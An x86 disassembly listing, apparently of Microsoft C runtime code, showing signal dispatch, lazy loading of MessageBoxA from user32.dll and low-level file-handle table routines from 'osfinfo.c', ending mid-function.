var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
sub ecx, 2
mov [ebp+var_20], ecx
cmp [ebp+var_20], 14h
ja loc_4308AE
mov eax, [ebp+var_20]
xor edx, edx
mov dl, byte_430A02[eax]
jmp off_4309EA[edx*4]
loc_430818: ; DATA XREF: _0:off_4309EA�o
mov [ebp+var_18], offset dword_4F352C
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp loc_4308B6
; ---------------------------------------------------------------------------
loc_430835: ; CODE XREF: sub_4307E0+31�j
; DATA XREF: _0:004309F6�o
mov [ebp+var_18], offset dword_4F3530
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_4308B6
; ---------------------------------------------------------------------------
loc_43084F: ; CODE XREF: sub_4307E0+31�j
; DATA XREF: _0:004309FA�o
mov [ebp+var_18], offset dword_4F3534
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_4308B6
; ---------------------------------------------------------------------------
loc_430869: ; CODE XREF: sub_4307E0+31�j
; DATA XREF: _0:004309F2�o
mov [ebp+var_18], offset dword_4F3538
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_4308B6
; ---------------------------------------------------------------------------
loc_430883: ; CODE XREF: sub_4307E0+31�j
; DATA XREF: _0:004309EE�o
call sub_428EE0
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_430A20
add esp, 8
add eax, 8
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
mov edx, [ecx]
mov [ebp+var_1C], edx
jmp short loc_4308B6
; ---------------------------------------------------------------------------
loc_4308AE: ; CODE XREF: sub_4307E0+20�j
; sub_4307E0+31�j
; DATA XREF: ...
or eax, 0FFFFFFFFh
jmp loc_4309E6
; ---------------------------------------------------------------------------
loc_4308B6: ; CODE XREF: sub_4307E0+50�j
; sub_4307E0+6D�j ...
cmp [ebp+var_C], 0
jz short loc_4308C6
push 1
call sub_423280
add esp, 4
loc_4308C6: ; CODE XREF: sub_4307E0+DA�j
cmp [ebp+var_1C], 1
jnz short loc_4308E3
cmp [ebp+var_C], 0
jz short loc_4308DC
push 1
call sub_423320
add esp, 4
loc_4308DC: ; CODE XREF: sub_4307E0+F0�j
xor eax, eax
jmp loc_4309E6
; ---------------------------------------------------------------------------
loc_4308E3: ; CODE XREF: sub_4307E0+EA�j
cmp [ebp+var_1C], 0
jnz short loc_430900
cmp [ebp+var_C], 0
jz short loc_4308F9
push 1
call sub_423320
add esp, 4
loc_4308F9: ; CODE XREF: sub_4307E0+10D�j
push 3
call sub_41E8C0
loc_430900: ; CODE XREF: sub_4307E0+107�j
cmp [ebp+arg_0], 8
jz short loc_430912
cmp [ebp+arg_0], 0Bh
jz short loc_430912
cmp [ebp+arg_0], 4
jnz short loc_43093E
loc_430912: ; CODE XREF: sub_4307E0+124�j
; sub_4307E0+12A�j
mov eax, [ebp+var_4]
mov ecx, [eax+54h]
mov [ebp+var_14], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+54h], 0
cmp [ebp+arg_0], 8
jnz short loc_43093E
mov eax, [ebp+var_4]
mov ecx, [eax+58h]
mov [ebp+var_8], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+58h], 8Ch
loc_43093E: ; CODE XREF: sub_4307E0+130�j
; sub_4307E0+149�j
cmp [ebp+arg_0], 8
jnz short loc_430980
mov eax, ds:dword_454380
mov [ebp+var_10], eax
jmp short loc_430957
; ---------------------------------------------------------------------------
loc_43094E: ; CODE XREF: sub_4307E0+19C�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_430957: ; CODE XREF: sub_4307E0+16C�j
mov edx, ds:dword_454380
add edx, ds:dword_454384
cmp [ebp+var_10], edx
jge short loc_43097E
mov eax, [ebp+var_10]
imul eax, 0Ch
mov ecx, [ebp+var_4]
mov edx, [ecx+50h]
mov dword ptr [edx+eax+8], 0
jmp short loc_43094E
; ---------------------------------------------------------------------------
loc_43097E: ; CODE XREF: sub_4307E0+186�j
jmp short loc_430989
; ---------------------------------------------------------------------------
loc_430980: ; CODE XREF: sub_4307E0+162�j
mov eax, [ebp+var_18]
mov dword ptr [eax], 0
loc_430989: ; CODE XREF: sub_4307E0:loc_43097E�j
cmp [ebp+var_C], 0
jz short loc_430999
push 1
call sub_423320
add esp, 4
loc_430999: ; CODE XREF: sub_4307E0+1AD�j
cmp [ebp+arg_0], 8
jnz short loc_4309B0
mov ecx, [ebp+var_4]
mov edx, [ecx+58h]
push edx
push 8
call [ebp+var_1C]
add esp, 8
jmp short loc_4309BA
; ---------------------------------------------------------------------------
loc_4309B0: ; CODE XREF: sub_4307E0+1BD�j
mov eax, [ebp+arg_0]
push eax
call [ebp+var_1C]
add esp, 4
loc_4309BA: ; CODE XREF: sub_4307E0+1CE�j
cmp [ebp+arg_0], 8
jz short loc_4309CC
cmp [ebp+arg_0], 0Bh
jz short loc_4309CC
cmp [ebp+arg_0], 4
jnz short loc_4309E4
loc_4309CC: ; CODE XREF: sub_4307E0+1DE�j
; sub_4307E0+1E4�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
mov [ecx+54h], edx
cmp [ebp+arg_0], 8
jnz short loc_4309E4
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+58h], ecx
loc_4309E4: ; CODE XREF: sub_4307E0+1EA�j
; sub_4307E0+1F9�j
xor eax, eax
loc_4309E6: ; CODE XREF: sub_4307E0+D1�j
; sub_4307E0+FE�j
mov esp, ebp
pop ebp
retn
sub_4307E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
off_4309EA dd offset loc_430818 ; DATA XREF: sub_4307E0+31�r
dd offset loc_430883
dd offset loc_430869
dd offset loc_430835
dd offset loc_43084F
dd offset loc_4308AE
byte_430A02 db 0 ; DATA XREF: sub_4307E0+2B�r
db 5
dd 5050501h, 1050501h, 2050505h, 5050505h, 0CC040305h
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430A20 proc near ; CODE XREF: _0:004306A0�p
; sub_4307E0+B6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_430A2A: ; CODE XREF: sub_430A20+31�j
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
cmp edx, [ebp+arg_0]
jz short loc_430A53
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ecx, ds:dword_45438C
imul ecx, 0Ch
mov edx, [ebp+arg_4]
add edx, ecx
cmp [ebp+var_4], edx
jnb short loc_430A53
jmp short loc_430A2A
; ---------------------------------------------------------------------------
loc_430A53: ; CODE XREF: sub_430A20+13�j
; sub_430A20+2F�j
mov eax, ds:dword_45438C
imul eax, 0Ch
mov ecx, [ebp+arg_4]
add ecx, eax
cmp [ebp+var_4], ecx
jnb short loc_430A75
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_0]
jnz short loc_430A75
mov eax, [ebp+var_4]
jmp short loc_430A77
; ---------------------------------------------------------------------------
loc_430A75: ; CODE XREF: sub_430A20+43�j
; sub_430A20+4E�j
xor eax, eax
loc_430A77: ; CODE XREF: sub_430A20+53�j
mov esp, ebp
pop ebp
retn
sub_430A20 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_428EE0
add eax, 58h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430A90 proc near ; CODE XREF: _0:00432019�p
push ebp
mov ebp, esp
call sub_428EE0
add eax, 54h
pop ebp
retn
sub_430A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430AA0 proc near ; CODE XREF: sub_4229A0+2CE�p
; sub_42FF30+1B0�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
cmp ds:dword_4F3540, 0
jnz short loc_430B13
push offset aUser32_dll_0 ; "user32.dll"
call ds:off_4F538C
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_430AE7
push offset aMessageboxa ; "MessageBoxA"
mov eax, [ebp+var_8]
push eax
call ds:off_4F5390
mov ds:dword_4F3540, eax
cmp ds:dword_4F3540, 0
jnz short loc_430AEB
loc_430AE7: ; CODE XREF: sub_430AA0+28�j
xor eax, eax
jmp short loc_430B57
; ---------------------------------------------------------------------------
loc_430AEB: ; CODE XREF: sub_430AA0+45�j
push offset aGetactivewindo ; "GetActiveWindow"
mov ecx, [ebp+var_8]
push ecx
call ds:off_4F5390
mov ds:dword_4F3544, eax
push offset aGetlastactivep ; "GetLastActivePopup"
mov edx, [ebp+var_8]
push edx
call ds:off_4F5390
mov ds:dword_4F3548, eax
loc_430B13: ; CODE XREF: sub_430AA0+14�j
cmp ds:dword_4F3544, 0
jz short loc_430B25
call ds:dword_4F3544
mov [ebp+var_4], eax
loc_430B25: ; CODE XREF: sub_430AA0+7A�j
cmp [ebp+var_4], 0
jz short loc_430B41
cmp ds:dword_4F3548, 0
jz short loc_430B41
mov eax, [ebp+var_4]
push eax
call ds:dword_4F3548
mov [ebp+var_4], eax
loc_430B41: ; CODE XREF: sub_430AA0+89�j
; sub_430AA0+92�j
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
call ds:dword_4F3540
loc_430B57: ; CODE XREF: sub_430AA0+49�j
mov esp, ebp
pop ebp
retn
sub_430AA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430B60 proc near ; CODE XREF: _0:loc_430FF2�p
; sub_4314E0:loc_431779�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov [ebp+var_8], 0FFFFFFFFh
push 12h
call sub_423280
add esp, 4
mov [ebp+var_C], 0
jmp short loc_430B8A
; ---------------------------------------------------------------------------
loc_430B81: ; CODE XREF: sub_430B60:loc_430D2B�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_430B8A: ; CODE XREF: sub_430B60+1F�j
cmp [ebp+var_C], 40h
jge loc_430D30
mov ecx, [ebp+var_C]
cmp ds:dword_4F36C0[ecx*4], 0
jz loc_430C96
mov edx, [ebp+var_C]
mov eax, ds:dword_4F36C0[edx*4]
mov [ebp+var_4], eax
jmp short loc_430BBD
; ---------------------------------------------------------------------------
loc_430BB4: ; CODE XREF: sub_430B60+F1�j
; sub_430B60:loc_430C81�j
mov ecx, [ebp+var_4]
add ecx, 24h
mov [ebp+var_4], ecx
loc_430BBD: ; CODE XREF: sub_430B60+52�j
mov edx, [ebp+var_C]
mov eax, ds:dword_4F36C0[edx*4]
add eax, 480h
cmp [ebp+var_4], eax
jnb loc_430C86
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx+4]
and edx, 1
test edx, edx
jnz loc_430C81
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_430C29
push 11h
call sub_423280
add esp, 4
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+8], 0
jnz short loc_430C1F
mov edx, [ebp+var_4]
add edx, 0Ch
push edx
call ds:dword_4F54A4 ; InitializeCriticalSection
mov eax, [ebp+var_4]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+8], ecx
loc_430C1F: ; CODE XREF: sub_430B60+A1�j
push 11h
call sub_423320
add esp, 4
loc_430C29: ; CODE XREF: sub_430B60+8E�j
mov eax, [ebp+var_4]
add eax, 0Ch
push eax
call ds:dword_4F53A8 ; RtlEnterCriticalSection
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx+4]
and edx, 1
test edx, edx
jz short loc_430C56
mov eax, [ebp+var_4]
add eax, 0Ch
push eax
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
jmp loc_430BB4
; ---------------------------------------------------------------------------
loc_430C56: ; CODE XREF: sub_430B60+E2�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0FFFFFFFFh
mov ecx, [ebp+var_C]
shl ecx, 5
mov edx, [ebp+var_C]
mov eax, [ebp+var_4]
sub eax, ds:dword_4F36C0[edx*4]
cdq
mov esi, 24h
idiv esi
add ecx, eax
mov [ebp+var_8], ecx
jmp short loc_430C86
; ---------------------------------------------------------------------------
loc_430C81: ; CODE XREF: sub_430B60+81�j
jmp loc_430BB4
; ---------------------------------------------------------------------------
loc_430C86: ; CODE XREF: sub_430B60+6F�j
; sub_430B60+11F�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_430C91
jmp loc_430D30
; ---------------------------------------------------------------------------
loc_430C91: ; CODE XREF: sub_430B60+12A�j
jmp loc_430D2B
; ---------------------------------------------------------------------------
loc_430C96: ; CODE XREF: sub_430B60+3F�j
push 79h
push offset aOsfinfo_c ; "osfinfo.c"
push 2
push 480h
call sub_41BE70
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_430D29
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov ds:dword_4F36C0[eax*4], ecx
mov edx, ds:dword_4F37C0
add edx, 20h
mov ds:dword_4F37C0, edx
jmp short loc_430CDC
; ---------------------------------------------------------------------------
loc_430CD3: ; CODE XREF: sub_430B60+1B2�j
mov eax, [ebp+var_4]
add eax, 24h
mov [ebp+var_4], eax
loc_430CDC: ; CODE XREF: sub_430B60+171�j
mov ecx, [ebp+var_C]
mov edx, ds:dword_4F36C0[ecx*4]
add edx, 480h
cmp [ebp+var_4], edx
jnb short loc_430D14
mov eax, [ebp+var_4]
mov byte ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0FFFFFFFFh
mov edx, [ebp+var_4]
mov byte ptr [edx+5], 0Ah
mov eax, [ebp+var_4]
mov dword ptr [eax+8], 0
jmp short loc_430CD3
; ---------------------------------------------------------------------------
loc_430D14: ; CODE XREF: sub_430B60+18F�j
mov ecx, [ebp+var_C]
shl ecx, 5
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
push edx
call sub_431070
add esp, 4
loc_430D29: ; CODE XREF: sub_430B60+153�j
jmp short loc_430D30
; ---------------------------------------------------------------------------
loc_430D2B: ; CODE XREF: sub_430B60:loc_430C91�j
jmp loc_430B81
; ---------------------------------------------------------------------------
loc_430D30: ; CODE XREF: sub_430B60+2E�j
; sub_430B60+12C�j ...
push 12h
call sub_423320
add esp, 4
mov eax, [ebp+var_8]
pop esi
mov esp, ebp
pop ebp
retn
sub_430B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430D50 proc near ; CODE XREF: _0:00431023�p
; sub_4314E0+379�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb loc_430DEA
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
cmp dword ptr [eax+edx], 0FFFFFFFFh
jnz short loc_430DEA
cmp ds:dword_451844, 1
jnz short loc_430DCA
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jz short loc_430DA2
cmp [ebp+var_4], 1
jz short loc_430DB0
cmp [ebp+var_4], 2
jz short loc_430DBE
jmp short loc_430DCA
; ---------------------------------------------------------------------------
loc_430DA2: ; CODE XREF: sub_430D50+42�j
mov edx, [ebp+arg_4]
push edx
push 0FFFFFFF6h
call ds:dword_4F5310 ; SetStdHandle
jmp short loc_430DCA
; ---------------------------------------------------------------------------
loc_430DB0: ; CODE XREF: sub_430D50+48�j
mov eax, [ebp+arg_4]
push eax
push 0FFFFFFF5h
call ds:dword_4F5310 ; SetStdHandle
jmp short loc_430DCA
; ---------------------------------------------------------------------------
loc_430DBE: ; CODE XREF: sub_430D50+4E�j
mov ecx, [ebp+arg_4]
push ecx
push 0FFFFFFF4h
call ds:dword_4F5310 ; SetStdHandle
loc_430DCA: ; CODE XREF: sub_430D50+36�j
; sub_430D50+50�j ...
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
mov edx, [ebp+arg_4]
mov [ecx+eax], edx
xor eax, eax
jmp short loc_430E03
; ---------------------------------------------------------------------------
loc_430DEA: ; CODE XREF: sub_430D50+D�j
; sub_430D50+2D�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_430E03: ; CODE XREF: sub_430D50+98�j
mov esp, ebp
pop ebp
retn
sub_430D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430E10 proc near ; CODE XREF: sub_422D30+69�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb loc_430ECB
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jz loc_430ECB
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
cmp dword ptr [ecx+eax], 0FFFFFFFFh
jz short loc_430ECB
cmp ds:dword_451844, 1
jnz short loc_430EAA
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jz short loc_430E88
cmp [ebp+var_4], 1
jz short loc_430E94
cmp [ebp+var_4], 2
jz short loc_430EA0
jmp short loc_430EAA
; ---------------------------------------------------------------------------
loc_430E88: ; CODE XREF: sub_430E10+68�j
push 0
push 0FFFFFFF6h
call ds:dword_4F5310 ; SetStdHandle
jmp short loc_430EAA
; ---------------------------------------------------------------------------
loc_430E94: ; CODE XREF: sub_430E10+6E�j
push 0
push 0FFFFFFF5h
call ds:dword_4F5310 ; SetStdHandle
jmp short loc_430EAA
; ---------------------------------------------------------------------------
loc_430EA0: ; CODE XREF: sub_430E10+74�j
push 0
push 0FFFFFFF4h
call ds:dword_4F5310 ; SetStdHandle
loc_430EAA: ; CODE XREF: sub_430E10+5C�j
; sub_430E10+76�j ...
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov dword ptr [edx+ecx], 0FFFFFFFFh
xor eax, eax
jmp short loc_430EE4
; ---------------------------------------------------------------------------
loc_430ECB: ; CODE XREF: sub_430E10+D�j
; sub_430E10+33�j ...
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_430EE4: ; CODE XREF: sub_430E10+B9�j
mov esp, ebp
pop ebp
retn
sub_430E10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430EF0 proc near ; CODE XREF: sub_422D30+9�p
; sub_422D30+24�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_430F3B
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jz short loc_430F3B
mov edx, [ebp+arg_0]
sar edx, 5
mov eax, [ebp+arg_0]
and eax, 1Fh
imul eax, 24h
mov ecx, ds:dword_4F36C0[edx*4]
mov eax, [ecx+eax]
jmp short loc_430F54
; ---------------------------------------------------------------------------
loc_430F3B: ; CODE XREF: sub_430EF0+C�j
; sub_430EF0+2E�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_430F54: ; CODE XREF: sub_430EF0+49�j
pop ebp
retn
sub_430EF0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov byte ptr [ebp-0Ch], 0
mov eax, [ebp+0Ch]
and eax, 8
test eax, eax
jz short loc_430F7D
mov cl, [ebp-0Ch]
or cl, 20h
mov [ebp-0Ch], cl
loc_430F7D: ; CODE XREF: _0:00430F72�j
mov edx, [ebp+0Ch]
and edx, 4000h
test edx, edx
jz short loc_430F92
mov al, [ebp-0Ch]
or al, 80h
mov [ebp-0Ch], al
loc_430F92: ; CODE XREF: _0:00430F88�j
mov ecx, [ebp+0Ch]
and ecx, 80h
test ecx, ecx
jz short loc_430FA8
mov dl, [ebp-0Ch]
or dl, 10h
mov [ebp-0Ch], dl
loc_430FA8: ; CODE XREF: _0:00430F9D�j
mov eax, [ebp+8]
push eax
call ds:dword_4F5314 ; GetFileType
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz short loc_430FD2
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
call sub_4299F0
add esp, 4
or eax, 0FFFFFFFFh
jmp loc_431060
; ---------------------------------------------------------------------------
loc_430FD2: ; CODE XREF: _0:00430FB9�j
cmp dword ptr [ebp-4], 2
jnz short loc_430FE3
mov cl, [ebp-0Ch]
or cl, 40h
mov [ebp-0Ch], cl
jmp short loc_430FF2
; ---------------------------------------------------------------------------
loc_430FE3: ; CODE XREF: _0:00430FD6�j
cmp dword ptr [ebp-4], 3
jnz short loc_430FF2
mov dl, [ebp-0Ch]
or dl, 8
mov [ebp-0Ch], dl
loc_430FF2: ; CODE XREF: _0:00430FE1�j _0:00430FE7�j
call sub_430B60
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0FFFFFFFFh
jnz short loc_43101B
call sub_429A90
mov dword ptr [eax], 18h
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_431060
; ---------------------------------------------------------------------------
loc_43101B: ; CODE XREF: _0:00430FFE�j
mov eax, [ebp+8]
push eax
mov ecx, [ebp-8]
push ecx
call sub_430D50
add esp, 8
mov dl, [ebp-0Ch]
or dl, 1
mov [ebp-0Ch], dl
mov eax, [ebp-8]
sar eax, 5
mov ecx, [ebp-8]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov al, [ebp-0Ch]
mov [edx+ecx+4], al
mov ecx, [ebp-8]
push ecx
call sub_431100
add esp, 4
mov eax, [ebp-8]
loc_431060: ; CODE XREF: _0:00430FCD�j _0:00431019�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431070 proc near ; CODE XREF: sub_422CB0+50�p
; sub_4272F0+50�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_4310D1
push 11h
call sub_423280
add esp, 4
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+8], 0
jnz short loc_4310C7
mov edx, [ebp+var_4]
add edx, 0Ch
push edx
call ds:dword_4F54A4 ; InitializeCriticalSection
mov eax, [ebp+var_4]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+8], ecx
loc_4310C7: ; CODE XREF: sub_431070+39�j
push 11h
call sub_423320
add esp, 4
loc_4310D1: ; CODE XREF: sub_431070+26�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
lea eax, [edx+ecx+0Ch]
push eax
call ds:dword_4F53A8 ; RtlEnterCriticalSection
mov esp, ebp
pop ebp
retn
sub_431070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431100 proc near ; CODE XREF: sub_422CB0+6B�p
; sub_4272F0+73�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
lea eax, [edx+ecx+0Ch]
push eax
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
pop ebp
retn
sub_431100 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431130 proc near ; CODE XREF: sub_422ED0+2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_431161
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_431174
loc_431161: ; CODE XREF: sub_431130+D�j
call sub_429A90
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_4311FE
; ---------------------------------------------------------------------------
loc_431174: ; CODE XREF: sub_431130+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 1
test eax, eax
jz short loc_4311DD
mov ecx, [ebp+arg_0]
push ecx
call sub_430EF0
add esp, 4
push eax
call ds:dword_4F530C ; FlushFileBuffers
test eax, eax
jnz short loc_4311C4
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
jmp short loc_4311CB
; ---------------------------------------------------------------------------
loc_4311C4: ; CODE XREF: sub_431130+87�j
mov [ebp+var_4], 0
loc_4311CB: ; CODE XREF: sub_431130+92�j
cmp [ebp+var_4], 0
jnz short loc_4311D3
jmp short loc_4311EF
; ---------------------------------------------------------------------------
loc_4311D3: ; CODE XREF: sub_431130+9F�j
call sub_429AA0
mov edx, [ebp+var_4]
mov [eax], edx
loc_4311DD: ; CODE XREF: sub_431130+70�j
call sub_429A90
mov dword ptr [eax], 9
mov [ebp+var_4], 0FFFFFFFFh
loc_4311EF: ; CODE XREF: sub_431130+A1�j
mov eax, [ebp+arg_0]
push eax
call sub_431100
add esp, 4
mov eax, [ebp+var_4]
loc_4311FE: ; CODE XREF: sub_431130+3F�j
mov esp, ebp
pop ebp
retn
sub_431130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431210 proc near ; CODE XREF: sub_427040+98�p
; sub_429560+EC�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D778
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F354C, 0
jnz short loc_43128E
lea eax, [ebp+var_1C]
push eax
push 1
push offset dword_43D410
push 1
call ds:dword_4F5304 ; GetStringTypeW
test eax, eax
jz short loc_431262
mov ds:dword_4F354C, 1
jmp short loc_43128E
; ---------------------------------------------------------------------------
loc_431262: ; CODE XREF: sub_431210+44�j
lea ecx, [ebp+var_1C]
push ecx
push 1
push offset dword_43D40C
push 1
push 0
call ds:dword_4F5308 ; GetStringTypeA
test eax, eax
jz short loc_431287
mov ds:dword_4F354C, 2
jmp short loc_43128E
; ---------------------------------------------------------------------------
loc_431287: ; CODE XREF: sub_431210+69�j
xor eax, eax
jmp loc_4313B8
